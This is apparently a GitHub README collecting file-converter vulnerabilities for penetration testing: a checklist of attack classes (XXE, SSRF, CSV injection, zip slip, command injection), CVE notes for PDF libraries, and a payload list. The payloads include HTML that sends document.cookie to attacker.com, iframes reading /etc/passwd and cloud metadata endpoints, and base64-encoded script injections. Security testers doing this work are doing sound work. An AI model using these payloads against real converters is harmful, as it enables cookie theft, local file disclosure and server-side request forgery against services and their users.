Skip to content

nhthongDfVn/File-Converter-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 

Repository files navigation

File-Converter-Exploit

A small collection of File converter vulnerability

File format

  • SpreadSheet: xls, xlsx, xltx
  • Document: doc, docx, odt
  • Powerpoint: ppt, pptx
  • Web: html
  • Markdown: md
  • Image: png, gif, jpeg, svg
  • Archive: zip

Checklist

  • Find document metadata: Product, version, sensitive data.
    • Export a PDF and find in document properties
    • Product About us
    • If Converter tool have import image/font feature: host a server and view User-agent header in incoming request.
  • Check if tool can executing <script> tag
  • SpreadSheet: CSV Injection
  • Archive: Zip slip, symlink attack
  • OLE/LFD injection
  • XXE
  • SSRF
  • DoS
  • HTML Injection/XSS
  • Command Injection
  • SSTI
  • Log4j
  • ImageMagick RCE

Tools

Paypload

<img src="x" onerror="document.write('test')" />
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<img src="http://attacker.com"/>
<link rel=attachment href="file:///etc/passwd">
<link rel=attachment href="http://168.254.168.254">
<iframe src="file:///etc/passwd"></frame>
<iframe src="http://168.254.168.254/latest/meta-data/"></frame>
<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlhzc2VkIGJ5IGFrMXQ0Iik8L3NjcmlwdD4=" HTTP-EQUIV="refresh" />
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<meta name="language" content="5;http://attacker.com/poc.svg" HTTP-EQUIV="refresh" />

Application/Framework

Office

Princexml

  • Website: https://www.princexml.com/
  • Vulnerability
    • <= 10: CVE-2018-19858: XXE + SSRF
    • <= 1.4.6: CVE-2016-10591: Downloads Resources over HTTP in prince--> RCE
    • PrinceXML Wrapper Class Command Injection link
    • XSS

TCPDF

  • Github: https://github.com/tecnickcom/TCPDF
  • Vulnerability
    • < 6.2.0: CVE-2018-17057: phar deserialization in TCPDF might lead to RCE
    • < 6.2.0: CVE-2017-6100: uploads files from the server generating PDF-files to an external FTP
    • SSRF Link

Node-HTML-PDF

pdfkit

WeasyPrint

wkhtmltopdf

Apache POI

Libreoffice

dompdf

xdocreport

Misc/Write-up

About

A small collection of File converter vulnerability

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published